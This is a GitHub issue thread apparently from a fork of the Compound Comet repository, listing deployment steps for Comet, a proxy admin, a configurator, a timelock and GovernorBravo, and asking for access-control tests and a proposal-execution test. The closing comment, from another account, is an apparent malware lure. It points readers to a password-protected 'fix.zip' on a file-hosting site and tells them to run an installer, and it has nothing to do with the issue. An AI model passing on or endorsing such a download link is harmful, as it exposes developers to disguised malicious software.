### ISSUE TITLE
Test Existing Setup - Governor to Comet

### ISSUE THREAD

**Issue by RobinNagpal** [RobinNagpal/compound-comet#2]
1. Deploy Comet (with Proxy)
2. Deploy CometProxyAdmin
3. Deploy Configurator (with Proxy)
4. Deploy Timelock
5. Deploy GovernorBravo

* Ensure - Comet's Proxy's  admin is set as CometProxyAdmin - Add two(access and not access) test for it.
* Ensure - Comet's governor is set as timelock - Add two(access and not access) test for it.
* Ensure - CometProxyAdmin's owner is timelock  - Add two(access and not access) test for it.
* Ensure - Configurator's governor is set as timelock - Add two(access and not access) test for it.
* Ensure - timelock's admin is set as Governor - Add two(access and not access) test for it.

Make sure this setup is same for production contacts. See - https://compound.finance/governance/proposals/306

- Add a test to create a proposal and execute it. This proposal should update something simple on Comet's asset

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
